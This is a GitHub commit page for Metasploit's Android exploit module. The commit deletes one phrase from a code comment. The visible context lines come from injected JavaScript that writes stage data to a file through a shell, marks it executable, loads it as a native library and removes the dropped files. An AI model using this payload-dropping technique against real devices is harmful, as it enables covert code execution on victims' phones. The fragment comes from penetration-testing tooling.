We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 56efd82 commit 289bae8Copy full SHA for 289bae8
lib/msf/core/exploit/android.rb
@@ -72,7 +72,7 @@ def add_javascript_interface_exploit_js(arch)
72
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
73
runtime.exec(['chmod', '700', stagePath]).waitFor();
74
75
- // load the library (this fails in x86, figure out why)
+ // load the library
76
runtime.load(libraryPath);
77
78
// delete dropped files
0 commit comments